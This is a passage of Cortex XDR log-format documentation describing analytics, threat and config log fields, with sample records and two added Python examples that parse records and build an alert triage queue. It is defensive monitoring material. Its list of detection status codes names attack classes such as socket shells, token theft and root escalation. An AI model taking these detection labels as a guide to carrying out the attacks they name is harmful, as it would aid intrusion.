alert/schedule/activity_last_seen_at  Time when Cortex XDR – Analytics last detected the network activity that caused it to raise the alert.

alert/schedule/first_detected_at  Time when Cortex XDR – Analytics first alerted on the network activity.

alert/schedule/last_detected_at  Time when Cortex XDR – Analytics last alerted on the network activity.

user/user_name  The name of the user associated with this alert. This name is obtained from Active Directory.

user/url  Provides the full URL to the user page in the Cortex XDR – Analytics user interface for the user who is associated with the alert.

user/display_name  The user name as retrieved from Active Directory. This is the user name displayed within the Cortex XDR – Analytics user interface for the user who is associated with this alert.

user/org_unit  The organizational unit of the user associated with this alert, as identified using Active Directory.

device/id  A unique ID assigned by Cortex XDR – Analytics to the device. All alerts raised due to activity occurring on this endpoint share this ID.

device/url  Provides the full URL to the device page in the Cortex XDR – Analytics user interface.

device/mac  The MAC address of the network card in use on the device.

device/hostname  The device host name.

device/ip  The device IP address.

device/ip_ranges  Identifies the subnet or subnets that the device is on. This sequence can contain multiple inclusive subnets. Each element in this sequence is a JSON object with the following fields:
• asset—The asset name assigned to the device from within the Cortex XDR Analytics user interface.
• max_ip—Last IP address in the subnet.
• min_ip—First IP address in the subnet.
• name—Subnet name.

device/owner  The user name of the person who owns the device.

device/org_unit  The organizational unit that owns the device, as identified by Active Directory.

files  Identifies the files associated with the alert. Each element in this sequence is a JSON object with the following fields:
• full_path—The file full path (including the file name).
• md5—The file MD5 hash.
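An added example, not part of the guide: this Python splits the comma-separated analytics record in the field order listed under "Syslog format" above, decodes the JSON sequence fields and Epoch timestamps, and then applies the rule given for the id field (the record with the most recent alert/schedule/last_detected_at is the current one) to find each alert's current state and build a triage queue. The four records, the xdr.example.invalid URLs, the App-ID value and the function names are constructed for this example; the code assumes the syslog header has already been stripped and only the comma-separated payload remains.

```python
import csv
import json

# Field order of a legacy-format analytics syslog record, copied from the
# "Syslog format" list in this section (37 fields).
ANALYTICS_FIELDS = [
    "sub_type", "time_generated", "id",
    "version_info/document_version", "version_info/magnifier_version",
    "version_info/detection_version",
    "alert/url", "alert/category", "alert/type", "alert/name",
    "alert/description/html", "alert/description/text",
    "alert/severity", "alert/state", "alert/is_whitelisted", "alert/ports",
    "alert/internal_destinations/single_destinations",
    "alert/internal_destinations/ip_ranges", "alert/external_destinations",
    "alert/app_id",
    "alert/schedule/activity_first_seen_at", "alert/schedule/activity_last_seen_at",
    "alert/schedule/first_detected_at", "alert/schedule/last_detected_at",
    "user/user_name", "user/url", "user/display_name", "user/org_unit",
    "device/id", "device/url", "device/mac", "device/hostname", "device/ip",
    "device/ip_ranges", "device/owner", "device/org_unit", "files",
]
# Fields the table defines as JSON sequences (they arrive CSV-quoted) and as
# Unix Epoch timestamps.
JSON_FIELDS = {"alert/ports", "alert/internal_destinations/single_destinations",
               "alert/internal_destinations/ip_ranges", "alert/external_destinations",
               "device/ip_ranges", "files"}
TIME_FIELDS = {"time_generated", "alert/schedule/activity_first_seen_at",
               "alert/schedule/activity_last_seen_at",
               "alert/schedule/first_detected_at", "alert/schedule/last_detected_at"}
SEVERITY_RANK = {"High": 3, "Medium": 2, "Low": 1}

# Constructed records. The device columns (fields 29-37) are shared; the
# device/id, MAC, hostname and IP are the ones shown in the example above.
DEVICE_TAIL = (
    '2-85e40edd-b2d1-1f25-2c1e-a3dd576c8a7e,https://xdr.example.invalid/device/2,'
    '00-50-56-a5-db-b2,DC1ENV3APC42,10.201.102.17,'
    '"[{""max_ip"":""10.201.102.255"",""name"":""lab"",""min_ip"":""10.201.102.0"",""asset"":""""}]",,,[]'
)
SAMPLE_LINES = [
    # alert 4: the Update arrives before the New record but carries the later
    # last_detected_at, so it is the current state
    'Update,1547717480,4,1,1.8,2019.2.0rc1,https://xdr.example.invalid/alert/4,'
    'Recon,Port Scan,Port Scan,<ul><li>The device scanned 3 ports</li></ul>,'
    'The device scanned 3 ports,Low,Reopened,false,"[22,80,443]",'
    '"[{""ip"":""10.201.102.40"",""name"":""fileserver""}]",'
    '"[{""max_ip"":""10.201.102.255"",""name"":""lab"",""min_ip"":""10.201.102.0""}]",'
    '[],,1542178800,1542190000,1542182400,1542190000,,,,,' + DEVICE_TAIL,
    'New,1547710000,4,1,1.8,2019.2.0rc1,https://xdr.example.invalid/alert/4,'
    'Recon,Port Scan,Port Scan,<ul><li>The device scanned 3 ports</li></ul>,'
    'The device scanned 3 ports,Low,Open,false,"[22,80,443]",'
    '"[{""ip"":""10.201.102.40"",""name"":""fileserver""}]",'
    '"[{""max_ip"":""10.201.102.255"",""name"":""lab"",""min_ip"":""10.201.102.0""}]",'
    '[],,1542178800,1542182400,1542182400,1542182400,,,,,' + DEVICE_TAIL,
    # alert 7: already Resolved, so it must stay out of the triage queue
    'Update,1547717500,7,1,1.8,2019.2.0rc1,https://xdr.example.invalid/alert/7,'
    'Lateral,Remote Execution,Remote Execution,<ul><li>Remote login attempts</li></ul>,'
    'Remote login attempts,High,Resolved,false,"[445,3389]",'
    '"[{""ip"":""10.201.102.41"",""name"":""dc01""}]",[],[],,'
    '1542178800,1542182400,1542182400,1542182400,,,,,' + DEVICE_TAIL,
    # alert 9: Open, Medium, one external destination and an App-ID
    'New,1547717600,9,1,1.8,2019.2.0rc1,https://xdr.example.invalid/alert/9,'
    'Exfiltration,Large Upload,Large Upload,<ul><li>Large upload to external host</li></ul>,'
    'Large upload to external host,Medium,Open,false,"[443]",[],[],'
    '"[""203.0.113.10""]",ssl,1542178800,1542182400,1542182400,1542182400,,,,,' + DEVICE_TAIL,
]


def parse_analytics_record(line):
    """Split one comma-separated record into a dict keyed by ANALYTICS_FIELDS,
    decoding the JSON sequence fields and the Epoch timestamps. The csv module
    undoes the doubled quotes inside quoted JSON fields."""
    values = next(csv.reader([line]))
    if len(values) != len(ANALYTICS_FIELDS):
        raise ValueError(f"expected {len(ANALYTICS_FIELDS)} fields, got {len(values)}")
    record = dict(zip(ANALYTICS_FIELDS, values))
    for name in JSON_FIELDS:
        record[name] = json.loads(record[name]) if record[name] else []
    for name in TIME_FIELDS:
        record[name] = int(record[name]) if record[name] else None
    record["alert/is_whitelisted"] = record["alert/is_whitelisted"].lower() == "true"
    return record


def current_alert_states(lines):
    """{alert id: its current record}: per the id field's definition, the record
    with the most recent alert/schedule/last_detected_at wins, whatever order
    the records arrived in."""
    latest = {}
    for line in lines:
        rec = parse_analytics_record(line)
        seen = latest.get(rec["id"])
        if seen is None or (rec["alert/schedule/last_detected_at"]
                            > seen["alert/schedule/last_detected_at"]):
            latest[rec["id"]] = rec
    return latest


def triage_queue(lines):
    """Ids of alerts still needing attention (state Open or Reopened, not
    whitelisted), highest severity first, then by id."""
    active = [r for r in current_alert_states(lines).values()
              if r["alert/state"] in ("Open", "Reopened") and not r["alert/is_whitelisted"]]
    active.sort(key=lambda r: (-SEVERITY_RANK.get(r["alert/severity"], 0), r["id"]))
    return [r["id"] for r in active]


if __name__ == "__main__":
    for alert_id, rec in current_alert_states(SAMPLE_LINES).items():
        print(alert_id, rec["alert/state"], rec["alert/severity"], rec["alert/ports"])
    print("triage:", triage_queue(SAMPLE_LINES))
```

The length check matters in practice: a description field that contains an unquoted comma, or a schema change that adds a column, shifts every later field, and silently mislabelled timestamps are worse than a rejected record.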

Cortex XDR Log Formats
The following topics list the fields of each Cortex XDR log type that the Cortex Data Lake app can forward
to an external server or email destination.
With log forwarding to a syslog receiver, the Cortex Data Lake sends logs in the IETF syslog message format
defined in RFC 5425. To facilitate parsing, the delimiter is a comma and each field is a comma-separated
value (CSV) string. The FUTURE_USE tag applies to fields that Cortex XDR does not currently implement.
With log forwarding to an email destination, the Cortex Data Lake sends an email with each field on a
separate line in the email body.
• Threat Logs
• Config Logs
• Analytics Logs
• System Logs

Threat Logs
Syslog format: recordType, class, FUTURE_USE, eventType, generatedTime, serverTime, agentTime,
tzOffset, FUTURE_USE, facility, customerId, trapsId, serverHost, serverComponentVersion, regionId,
isEndpoint, agentId, osType, isVdi, osVersion, is64, agentIp, deviceName, deviceDomain, severity,
trapsSeverity, agentVersion, contentVersion, protectionStatus, preventionKey, moduleId, profile,
moduleStatusId, verdict, preventionMode, terminate, terminateTarget, quarantine, block, postDetected,
eventParameters(Array), sourceProcessIdx(Array), targetProcessIdx(Array), fileIdx(Array), processes(Array),
files(Array), users(Array), urls(Array), description(Array)
Email body format example:

recordType: threat
messageData/class: threat
messageData/subClass:
eventType: AgentSecurityEvent
generatedTime: 2019-01-29T05:07:58.045-08:00
serverTime: 2018-07-02T20:01:39.591Z
endPointHeader/agentTime: 2018-07-02T20:01:03Z
endPointHeader/tzOffset: 180
product:
facility: TrapsAgent
customerId: 245143
trapsId: mac510a2monday-01
serverHost: coreop-qaauta-2606-0-112132729246-266
serverComponentVersion: 2.0.2
regionId: 70
isEndpoint: 1
agentId: dc3af3198f172048082c21ff0956866b
endPointHeader/osType: 2
endPointHeader/isVdi: 0
endPointHeader/osVersion: 10.11.6
endPointHeader/is64: 1
endPointHeader/agentIp: 10.200.37.201
endPointHeader/deviceName: A1260700MC1011
endPointHeader/deviceDomain:
severity: emergency
messageData/trapsSeverity: medium
endPointHeader/agentVersion: 5.1.0.1401
endPointHeader/contentVersion: 26-3625
endPointHeader/protectionStatus: 0
messageData/preventionKey: 9a94965188d2455486dd8d60cf4b3849
messageData/moduleId: COMPONENT_EPM_J01

messageData/profile: ExploitModules
messageData/moduleStatusId: CYSTATUS_JIT_EXCEPTION
messageData/verdict:
messageData/preventionMode: blocked
messageData/terminate: 1
messageData/terminateTarget:
quarantine:
messageData/block: 0
messageData/postDetected: 0
messageData/eventParameters: "[""/Users/administrator/Desktop/JitMac/
j01_test"",""711046b89e2f2c70cdbb41f615c54bd1b4270ecbbb176edeb1bb4fe4619""]"
messageData/sourceProcessIdx: 0
messageData/targetProcessIdx: -1
messageData/fileIdx: 0
messageData/processes: "[{""exeFileIdx"":0,""commandLine"":""/
Users/Administrator/Desktop/JitMac/j01_test test=system
depth=1"",""userIdx"":0,""pid"":1359,""parentId"":452}]"
messageData/files:
"[{""sha256"":""711046b89e2f2c70cdbb41f615c54bd1b4270ecbbb176edeb1bb4654619"",
""rawFullPath"":""/Users/administrator/Desktop/JitMac/j01_test"",""signers"":
[""N/A""],""fileName"":""j01_test""}]"
messageData/users: "[{""userName"":""Administrator""}]"
messageData/urls: []
messageData/description: Memory Corruption Exploit

Field Name  Description

recordType  Record type associated with the event, which you can use when managing logging quotas. In this case, the record type is threat, which includes logs related to security events that occur on the endpoints.

class  Class of Cortex XDR agent log: config, policy, system, or agent_log.

eventType  Subtype of event: AgentActionReport, AgentDeviceControlViolation, AgentGenericMessage, AgentSamReport, AgentScanReport, AgentSecurityEvent, AgentStatistics, AgentTimelineEvent, ServerLogPerAgent, ServerLogPerTenant, or ServerLogSystem.

generatedTime  Coordinated Universal Time (UTC) equivalent of the time at which an event was logged. For agent events, this represents the time on the endpoint. For policy, configuration, and system events, this represents the time on Cortex XDR in ISO-8601 string representation (for example, 2017-01-24T09:08:59Z).

serverTime  Coordinated Universal Time (UTC) equivalent of the time at which the server generated the log. If the log was generated on an endpoint, this field identifies the time the server received the log in ISO-8601 string representation (for example, 2017-01-24T09:08:59Z).

agentTime  Coordinated Universal Time (UTC) equivalent of the time at which an agent logged an event, in ISO-8601 string representation.

tzOffset  Effective endpoint time zone offset from UTC, in minutes.

facility  The Cortex XDR system component that initiated the event, for example: TrapsAgent, TrapsServiceCore, TrapsServiceManagement, and TrapsServiceBackend.

customerId  The ID that uniquely identifies the Cortex Data Lake instance which received this log record.

trapsId  Tenant external ID.

serverHost  Hostname of Cortex XDR.

serverComponentVersion  Software version of Cortex XDR.

regionId  ID of the Cortex XDR region:
• 10—Americas (N. Virginia)
• 70—EMEA (Frankfurt)

isEndpoint  Indicates whether the event occurred on an endpoint:
• 0—No, host is not an endpoint.
• 1—Yes, host is an endpoint.

agentId  Unique identifier for the Cortex XDR agent.

osType  Operating system of the endpoint:
• 1—Windows
• 2—OS X/macOS
• 3—Android
• 4—Linux

isVdi  Indicates whether the endpoint is a virtual desktop infrastructure (VDI):
• 0—The endpoint is not a VDI
• 1—The endpoint is a VDI

osVersion  Full version number of the operating system running on the endpoint. For example, 6.1.7601.19135.


is64  Indicates whether the endpoint is running a 64-bit version of Windows:
• 0—The endpoint is not running x64 architecture
• 1—The endpoint is running x64 architecture

agentIp  IP address of the endpoint.

deviceName  Hostname of the endpoint on which the event was logged.

deviceDomain  Domain to which the endpoint belongs.

severity  Syslog severity level associated with the event.
• 2—Critical. Used for events that require immediate attention.
• 3—Error. Used for events that require special handling.
• 4—Warning. Used for events that sometimes require special handling.
• 5—Notice. Used for normal but significant events that can require attention.
• 6—Informational. Informational events that do not require attention.
Each event also has an associated Cortex XDR severity. See the messageData.trapsSeverity field for details.

trapsSeverity  Severity level associated with the event, as defined for Cortex XDR. Each of these severities corresponds to a syslog severity level:
• 0—Informational. Informational messages that do not require attention. Identical to the syslog 6 (Informational) severity level.
• 1—Low. Used for normal but significant events that can require attention. Corresponds to the syslog 5 (Notice) severity level.
• 2—Medium. Used for events that sometimes require special handling. Corresponds to the syslog 4 (Warning) severity level.
• 3—High. Used for events that require special handling. Corresponds to the syslog 3 (Error) severity level.
• 4—Critical. Used for events that require immediate attention. Corresponds to the syslog 2 (Critical) severity level.
See also the severity log field.

agentVersion  Version of the Cortex XDR agent.


contentVersion  Content version in the local security policy.

protectionStatus  Cortex XDR agent protection status:
• 0—Protected
• 1—OsVersionIncompatible
• 2—AgentIncompatible

preventionKey  Unique identifier for security events.

moduleId  Security module name.

profile  Name of the security profile that triggered the event.

moduleStatusId  Identifies the specific component of Cortex XDR modules:
• CYSTATUS_ABNORMAL_PROCESS_TERMINATION
• CYSTATUS_ALIGNED_HEAP_SPRAY_DETECTED
• CYSTATUS_CHILD_PROCESS_BLOCKED
• CYSTATUS_CORE_LIBRARY_LOADED
• CYSTATUS_CORE_LIBRARY_UNLOADING
• CYSTATUS_CPLPROT_BLACKLIST
• CYSTATUS_CPLPROT_REMOTE_DRIVE
• CYSTATUS_CPLPROT_REMOVABLE_DRIVE
• CYSTATUS_CYINJCT_DISPATCH
• CYSTATUS_CYINJCT_MAPPING
• CYSTATUS_CYVERA_PREVENTION
• CYSTATUS_DANGEROUS_SYSTEM_SERVICE_CALLED
• CYSTATUS_DEMO_EVENT
• CYSTATUS_DEP_SEH_INF_VIOLATION
• CYSTATUS_DEP_SEH_VIOLATION
• CYSTATUS_DEP_VIOLATION
• CYSTATUS_DEP_VIOLATION_UNALLOCATED
• CYSTATUS_DEVICE_BLOCKED
• CYSTATUS_DLLPROT_BLACKLIST
• CYSTATUS_DLLPROT_CURRENT_WORKING_DIRECTORY
• CYSTATUS_DLLPROT_REMOTE_DRIVE
• CYSTATUS_DLLPROT_REMVABLE_DRIVE
• CYSTATUS_DOTNET_CRITICAL
• CYSTATUS_DSE
• CYSTATUS_EPM_INIT_FAILED
• CYSTATUS_FAILED_CHECK_MEDIA
• CYSTATUS_FILE_DELETION_BOOT_DONE
• CYSTATUS_FILE_DELETION_FAILED
• CYSTATUS_FILE_DELETION_SUCCEEDED
• CYSTATUS_FINGERPRINTING_ATTEMPT
• CYSTATUS_FONT_PROT_DUQU
• CYSTATUS_FORBIDDEN_MEDIA
• CYSTATUS_FORBIDDEN_OPTICAL_MEDIA
• CYSTATUS_FORBIDDEN_REMOTE_MEDIA
• CYSTATUS_FORBIDDEN_REMOVABLE_MEDIA
• CYSTATUS_GS_COOKIE_CORRUPTED_COOKIE
• CYSTATUS_GUARD_PAGE_VIOLATION
• CYSTATUS_HASH_CONTROL
• CYSTATUS_HEAP_CORRUPTION
• CYSTATUS_HOOKING_ENTRY_POINT_FAILED
• CYSTATUS_HOTPATCH_HIJACKING
• CYSTATUS_ILLEGAL_EXECUTABLE
• CYSTATUS_ILLEGAL_UNSIGNED_EXECUTABLE
• CYSTATUS_INJ_APPCONTAINER_FAILURE
• CYSTATUS_INJ_CTX_FAILURE
• CYSTATUS_JAVA_FILE
• CYSTATUS_JAVA_PROC
• CYSTATUS_JAVA_REG
• CYSTATUS_JIT_EXCEPTION
• CYSTATUS_LINUX_BRUTEFORCE_PREVENTED
• CYSTATUS_LINUX_ROOT_ESCALATION_PREVENTED
• CYSTATUS_LINUX_SHELLCODE_PREVENTED
• CYSTATUS_LINUX_SOCKET_SHELL_PREVENTED
• CYSTATUS_LOCAL_ANALYSIS
• CYSTATUS_MACOS_DLPROT_CWD_HIJACK
• CYSTATUS_MACOS_DLPROT_DUPLICATE_PATH_CHECK
• CYSTATUS_MACOS_G02_BLOCK_ALL
• CYSTATUS_MACOS_G02_SIGNER_NAME_MISMATCH
• CYSTATUS_MACOS_G02_SIGN_LEVEL_BELOW_MIN
• CYSTATUS_MACOS_G02_SIGN_LEVEL_BELOW_PARENT
• CYSTATUS_MACOS_MALICIOUS_DYLIB
• CYSTATUS_MACOS_ROOT_ESCALATION_PREVENTED
• CYSTATUS_MALICIOUS_APK
• CYSTATUS_MALICIOUS_DLL
• CYSTATUS_MALICIOUS_EXE
• CYSTATUS_MALICIOUS_EXE_ASYNC
• CYSTATUS_MALICIOUS_MACRO
• CYSTATUS_MALICIOUS_STRING_DETECTED
• CYSTATUS_MEMORY_USAGE_LIMIT_EXCEEDED
• CYSTATUS_NOP_SLED_DETECTED
• CYSTATUS_NO_MEMORY
• CYSTATUS_NO_REGISTER_CORRECTED
• CYSTATUS_PREALLOCATED_ADDR_ACCESSED
• CYSTATUS_PROCESS_CREATION_VIOLATION
• CYSTATUS_QUARANTINE_FAILED
• CYSTATUS_QUARANTINE_SUCCEEDED
• CYSTATUS_RANSOMWARE
• CYSTATUS_RESTORE_FAILED
• CYSTATUS_RESTORE_SUCCEEDED
• CYSTATUS_ROP_MITIGATION
• CYSTATUS_SEH_CRITICAL
• CYSTATUS_SEH_INF_CRITICAL
• CYSTATUS_SHELL_CODE_TRAP_CALLED
• CYSTATUS_STACK_OVERFLOW
• CYSTATUS_SUSPENDED_PROCESS_BLOCKED
• CYSTATUS_SUSPICIOUS_APC
• CYSTATUS_SUSPICIOUS_LINK_FILE
• CYSTATUS_SYSTEM_SCAN_FINISHED
• CYSTATUS_SYSTEM_SCAN_STARTED
• CYSTATUS_THREAD_INJECTION
• CYSTATUS_TLA_MODEL_NOT_LOADED
• CYSTATUS_TOKEN_THEFT_FILE_OPERATION
• CYSTATUS_TOKEN_THEFT_PROCESS_CREATED
• CYSTATUS_TOKEN_THEFT_REGISTRY_OPERATION
• CYSTATUS_TOKEN_THEFT_THREAD_CREATED
• CYSTATUS_TOKEN_THEFT_THREAD_INJECTED
• CYSTATUS_TOKEN_THEFT_THREAD_STARTED
• CYSTATUS_UASLR_CRITICAL
• CYSTATUS_UNALLOWED_CODE_SEGMENT
• CYSTATUS_UNAUTHORIZED_CALL_TO_SYSTEM_SERVICE
• CYSTATUS_UNSIGNED_CHILD_PROCESS_BLOCKED
• CYSTATUS_WILDFIRE_GRAYWARE
• CYSTATUS_WILDFIRE_MALWARE
• CYSTATUS_WILDFIRE_UNKNOWN

verdict  Verdict for the file:
• 0—Benign
• 1—Malware
• 2—Grayware
• 4—Phishing
• 99—Unknown

preventionMode  Action carried out by the Cortex XDR agent (block or notify). The prevention mode is specified in the rule configuration.

terminate  Termination action taken on the file:
• 0—Cortex XDR did not terminate the file.
• 1—Cortex XDR terminated the file.

terminateTarget  Termination action taken on the target file (relevant for some child process execution events where the child process is terminated but not the parent process):
• 0—Target file was not terminated.
• 1—Target file was terminated.

quarantine  Quarantine action taken on the file:
• 0—File was not quarantined.
• 1—File was quarantined.

block  Block action taken on the file:
• 0—File was not blocked.
• 1—File was blocked.

postDetected  Post detection status of the file:
• 0—Initial prevention.
• 1—Detected after an initial execution.

eventParameters(Array)  Parameters associated with the type of event. For example, username, endpoint hostname, and filename.

sourceProcessIdx(Array)  The prevention source process index in the processes array.

targetProcessIdx(Array)  Target process index in the processes array. A missing or negative value means there is no target process.

fileIdx(Array)  Index of target files for specific security events, such as Scanning, Malicious DLL, and Malicious Macro events.

processes(Array)  All related details for the process file that triggered an event:
• 1—System process ID
• 2—Parent process ID
• 3—File object corresponding to the process executable file
• 4—Command line arguments (if any)
• 5—Description field of the VERSIONINFO resource
• 6—File version field of the VERSIONINFO resource

files(Array)  File object includes:
• 1—SHA256 hash value of the file
• 2—SHA256 hash value of the macro
• 3—Raw full filepath
• 4—A predefined drive type: local, network mapped drive, UNC path host, removable media, etc.
• 5—File name (with no extension), such as AdapterTroubleshooter
• 6—File extension (for example, EXE or DLL)
• 7—File type defined by the Cortex XDR agent
• 8—UTC file creation time
• 9—UTC file modification time
• 10—UTC file access time
• 11—File attributes bitmask
• 12—File size in bytes
• 13—Signer field of the code signing certificate

users(Array)  Details about the active user on the endpoint when the event occurred:
• 1—Username of the active user on the endpoint.
• 2—Domain to which the user account belongs.

urls(Array)  Additional details related to a URL:
• 1—Raw URL
• 2—URL scheme, for example HTTP, HTTPS, FTP, or LDAP
• 3—Hostname in punycode
• 4—Host port
• 5—Canonicalized URL path part according to scheme requirements
• 6—Query parameters (HTTP and HTTPS only)
• 7—Fragment parameters (HTTP and HTTPS only)

description(Array)  (Mac only) Description of components related to Cortex XDR. For example, the description of the ROP, JIT, and Dylib hijacking modules for Mac endpoints is Memory Corruption Exploit.
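As an added example (not the guide's own code), this Python takes a threat log in the email-body layout shown at the start of this section, decodes the CSV-quoted processes, files and users arrays, follows sourceProcessIdx, targetProcessIdx, fileIdx, exeFileIdx and userIdx to the objects they index, and maps trapsSeverity to the syslog level using the correspondence given in the trapsSeverity row above. The record is constructed from the fields in the example (with a placeholder SHA256); parse_threat_log, csv_json, syslog_severity and resolve_event are names chosen here, and the code assumes each value sits on a single line.

```python
import json

# Constructed threat-log record in the email-body layout (one field per line).
# Array fields keep the CSV-style doubled quotes of the forwarded log; the
# SHA256 is a placeholder, not a real file hash.
SAMPLE_THREAT_LOG = """\
recordType: threat
messageData/class: threat
eventType: AgentSecurityEvent
generatedTime: 2019-01-29T05:07:58.045-08:00
endPointHeader/osType: 2
endPointHeader/deviceName: A1260700MC1011
messageData/trapsSeverity: medium
messageData/preventionKey: 9a94965188d2455486dd8d60cf4b3849
messageData/moduleId: COMPONENT_EPM_J01
messageData/profile: ExploitModules
messageData/moduleStatusId: CYSTATUS_JIT_EXCEPTION
messageData/verdict:
messageData/preventionMode: blocked
messageData/terminate: 1
messageData/terminateTarget:
quarantine:
messageData/block: 0
messageData/postDetected: 0
messageData/sourceProcessIdx: 0
messageData/targetProcessIdx: -1
messageData/fileIdx: 0
messageData/processes: "[{""exeFileIdx"":0,""commandLine"":""/Users/Administrator/Desktop/JitMac/j01_test test=system depth=1"",""userIdx"":0,""pid"":1359,""parentId"":452}]"
messageData/files: "[{""sha256"":""1111111111111111111111111111111111111111111111111111111111111111"",""rawFullPath"":""/Users/administrator/Desktop/JitMac/j01_test"",""signers"":[""N/A""],""fileName"":""j01_test""}]"
messageData/users: "[{""userName"":""Administrator""}]"
messageData/urls: []
messageData/description: Memory Corruption Exploit
"""

# trapsSeverity -> syslog severity, as given in the trapsSeverity row of the table.
TRAPS_TO_SYSLOG = {"informational": 6, "low": 5, "medium": 4, "high": 3, "critical": 2}
TRAPS_NUMERIC = {0: "informational", 1: "low", 2: "medium", 3: "high", 4: "critical"}


def parse_threat_log(body):
    """One 'name: value' per line; the field name never contains a colon, so the
    first colon splits name from value (values may contain colons, e.g. URLs)."""
    fields = {}
    for line in body.splitlines():
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        fields[name.strip()] = value.strip()
    return fields


def csv_json(value):
    """Decode a JSON array field that arrives CSV-quoted ("[...]" with doubled
    inner quotes). An empty value or a bare [] decodes to an empty list."""
    if not value:
        return []
    if value[0] == '"' and value[-1] == '"':
        value = value[1:-1].replace('""', '"')
    return json.loads(value)


def syslog_severity(traps_severity):
    """Map a Cortex XDR severity (0-4 or its name, any case) to the syslog level."""
    key = str(traps_severity).strip().lower()
    if key.isdigit():
        key = TRAPS_NUMERIC[int(key)]
    return TRAPS_TO_SYSLOG[key]


def resolve_event(fields):
    """Join the index fields to the process, file and user objects they point at
    and return a flat summary of what the agent saw and did."""
    processes = csv_json(fields.get("messageData/processes", ""))
    files = csv_json(fields.get("messageData/files", ""))
    users = csv_json(fields.get("messageData/users", ""))
    src_idx = int(fields.get("messageData/sourceProcessIdx") or 0)
    tgt_idx = int(fields.get("messageData/targetProcessIdx") or -1)  # negative: no target
    file_idx = int(fields.get("messageData/fileIdx") or -1)
    source = processes[src_idx]
    image = files[source["exeFileIdx"]]
    return {
        "module": fields.get("messageData/moduleId", ""),
        "status": fields.get("messageData/moduleStatusId", ""),
        "prevention_mode": fields.get("messageData/preventionMode", ""),
        "terminated": fields.get("messageData/terminate") == "1",
        "blocked": fields.get("messageData/block") == "1",
        "post_detected": fields.get("messageData/postDetected") == "1",
        "pid": source["pid"],
        "parent_pid": source["parentId"],
        "command_line": source["commandLine"],
        "image_path": image["rawFullPath"],
        "sha256": image["sha256"],
        "signers": image["signers"],
        "user": users[source["userIdx"]]["userName"],
        "target_process": processes[tgt_idx] if 0 <= tgt_idx < len(processes) else None,
        "event_file": files[file_idx]["rawFullPath"] if 0 <= file_idx < len(files) else None,
        "syslog_severity": syslog_severity(fields.get("messageData/trapsSeverity", "informational")),
    }


if __name__ == "__main__":
    print(json.dumps(resolve_event(parse_threat_log(SAMPLE_THREAT_LOG)), indent=2))
```

Resolving the indexes up front is what makes the record useful to a SIEM rule: the hash and path of the executable that hit CYSTATUS_JIT_EXCEPTION, and whether it was actually terminated, come out as plain fields instead of positions inside nested JSON.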

Config Logs
Syslog format: recordType, class, FUTURE_USE, subClassId, eventType, eventCategory, generatedTime,
serverTime, FUTURE_USE, facility, customerId, trapsId, serverHost, serverComponentVersion, regionId,
isEndpoint, severity, trapsSeverity, messageCode, friendlyName, FUTURE_USE, msgTextEn, userFullName,
userName, userRole, userDomain, additionalData(Array), messageCode, errorText, errorData, resultData
Email body format example:

recordType: system
messageData/class: system
messageData/subClass: Provisioning
messageData/subClassId: 13
eventType: ServerLogPerTenant
messageData/eventCategory: tenant
generatedTime: 2019-01-31T18:15:19.000000+00:00
serverTime: 2019-01-31T18:15:19.000000+00:00
product:
facility: TrapsServerManagement

customerId: 004403511
trapsId: 18520498190303952
serverHost: 14917869646-201.proda.brz
serverComponentVersion: 2.0.9+624
regionId:
isEndpoint: 0
agentId:
severity: notice
messageData/trapsSeverity: informational
messageData/messageCode: 19015
messageData/friendlyName: User Login
messageData/msgTextLoc:
messageData/msgTextEn: User [email protected] has logged in with
role superadmin
endPointHeader/userFullName:
endPointHeader/username:
endPointHeader/userRole:
endPointHeader/userDomain:
endPointHeader/agentTime:
endPointHeader/tzOffset:
endPointHeader/osType:
endPointHeader/isVdi:
endPointHeader/osVersion:
endPointHeader/is64:
endPointHeader/agentIp:
endPointHeader/deviceName:
endPointHeader/deviceDomain:
endPointHeader/agentVersion:
endPointHeader/contentVersion:
endPointHeader/protectionStatus:
messageData/userFullName:
messageData/username:
messageData/userRole:
messageData/userDomain:
messageData/messageName:
messageData/messageId:
messageData/processStatus:
messageData/errorText:
messageData/errorData:
messageData/resultData:
messageData/parameters:
messageData/additionalData: {}

Field Name / Description

recordType
  Record type associated with the event and that you can use when managing logging quotas. In this case, the record type is config, which includes logs related to Cortex XDR administration and configuration changes.

class
  Class of Cortex XDR log: config, policy, system, or agent_log.

subClass
  Subclass of event. Used to categorize logs in Cortex XDR.

subClassId
  Numeric representation of the subClass field for easy sorting and filtering.

eventType
  Subtype of event.

eventCategory
  Category of event, used internally for processing the flow of logs. Event categories vary by class:
  • config—deviceManagement, distributionManagement, reportManagement, securityEventManagement, systemManagement
  • policy—exceptionManagement, policyManagement, profileManagement, sam
  • system—licensing, provisioning, tenant, userAuthentication, workerProcessing
  • agent_log—agentFlow

generatedTime
  Coordinated Universal Time (UTC) equivalent of the time at which an event was logged. For agent events, this represents the time on the endpoint. For policy, configuration, and system events, this represents the time on Cortex XDR, in ISO-8601 string representation (for example, 2017-01-24T09:08:59Z).

serverTime
  Coordinated Universal Time (UTC) equivalent of the time at which the server generated the log. If the log was generated on an endpoint, this field identifies the time the server received the log, in ISO-8601 string representation (for example, 2017-01-24T09:08:59Z).

facility
  The Cortex XDR system component that initiated the event, for example: TrapsAgent, TrapsServiceCore, TrapsServiceManagement, and TrapsServiceBackend.

customerId
  The ID that uniquely identifies the Cortex Data Lake instance which received this log record.

trapsId
  Tenant external ID.

serverHost
  Hostname of Cortex XDR.

serverComponentVersion
  Software version of Cortex XDR.

regionId
  ID of Cortex XDR region:
  • 10—Americas (N. Virginia)
  • 70—EMEA (Frankfurt)

isEndpoint
  Indicates whether the event occurred on an endpoint:
  • 0—No, host is not an endpoint.
  • 1—Yes, host is an endpoint.

agentId
  Unique identifier for the Cortex XDR agent.

severity
  Syslog severity level associated with the event:
  • 2—Critical. Used for events that require immediate attention.
  • 3—Error. Used for events that require special handling.
  • 4—Warning. Used for events that sometimes require special handling.
  • 5—Notice. Used for normal but significant events that can require attention.
  • 6—Informational. Informational events that do not require attention.
  Each event also has an associated Cortex XDR severity. See the messageData.trapsSeverity field for details.

trapsSeverity
  Severity level associated with the event defined for Cortex XDR. Each of these severities corresponds to a syslog severity level:
  • 0—Informational. Informational messages that do not require attention. Identical to the syslog 6 (Informational) severity level.
  • 1—Low. Used for normal but significant events that can require attention. Corresponds to the syslog 5 (Notice) severity level.
  • 2—Medium. Used for events that sometimes require special handling. Corresponds to the syslog 4 (Warning) severity level.
  • 3—High. Used for events that require special handling. Corresponds to the syslog 3 (Error) severity level.
  • 4—Critical. Used for events that require immediate attention. Corresponds to the syslog 2 (Critical) severity level.
  See also the severity log field.

messageCode
